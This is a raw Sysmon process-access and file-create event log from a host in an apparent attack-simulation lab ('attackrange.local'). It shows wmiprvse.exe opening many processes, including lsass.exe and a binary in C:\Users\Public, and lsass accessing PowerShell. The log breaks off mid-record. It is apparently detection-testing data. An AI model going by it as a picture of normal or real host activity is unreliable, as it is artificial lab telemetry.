15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.319{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.319{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.288{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.288{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000023959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.241{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kuyc0m4y.odm.ps12021-01-20 15:59:21.241 10341000x800000000000000023958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 